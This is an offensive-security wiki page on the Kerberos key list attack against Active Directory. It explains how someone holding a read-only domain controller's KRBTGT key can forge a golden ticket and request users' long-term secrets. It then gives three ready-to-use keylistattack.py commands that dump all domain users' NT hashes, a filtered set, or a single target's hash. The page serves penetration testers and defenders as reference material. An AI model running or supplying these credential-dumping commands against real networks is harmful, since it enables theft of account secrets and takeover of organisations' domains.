search
Infiltr8ForumGitHub
githubEdit

Kerberos key list

hashtag
Theory

It is possible to retrieve the long term secret of a user (e.g. NT hash) by sending a TGS-REQ (service ticket request) to the KRBTGT service with a KERB-KEY-LIST-REQarrow-up-right message type. This was introduced initially to support SSO with legacy protocols (e.g. NTLM) with Azure AD on on-premises resources. An attacker can abuse this by forging a RODC golden ticket for a target user and use it to send a TGS-REQ to the KRBTGT service with a padata filed value of 161arrow-up-right (KERB-KEY-LIST-REQ). Knowing the KRBTGT key of the RODC is required here. The TGS-REP will contain the long term secret of the user in the KERB-KEY-LIST-REP key value.

hashtag
Practice

From UNIX-like systems, the keylistattack.pyarrow-up-right tool (Python) can be used for this purpose.

#Attempt to dump all the users' hashes even the ones in the Denied list
#Low privileged credentials are needed in the command for the SAMR enumeration
keylistattack.py -rodcNo "$KBRTGT_NUMBER" -rodcKey "$KRBTGT_AES_KEY" -full "$DOMAIN"/"$USER":"$PASSWORD"@"$RODC-server"

#Attempt to dump all the users' hashes but filter the ones in the Denied list
#Low privileged credentials are needed in the command for the SAMR enumeration
keylistattack.py -rodcNo "$KBRTGT_NUMBER" -rodcKey "$KRBTGT_AES_KEY" "$DOMAIN"/"$USER":"$PASSWORD"@"$RODC-server"

#Attempt to dump a specific user's hash
keylistattack.py -rodcNo "$KBRTGT_NUMBER" -rodcKey "$KRBTGT_AES_KEY" -t "$TARGETUSER" -kdc "$RODC_FQDN" LIST

hashtag
Resources

LogoKerberos key list | The Hacker Recipeswww.thehacker.recipeschevron-right
LogoResource HubSecureAuthchevron-right

Last updated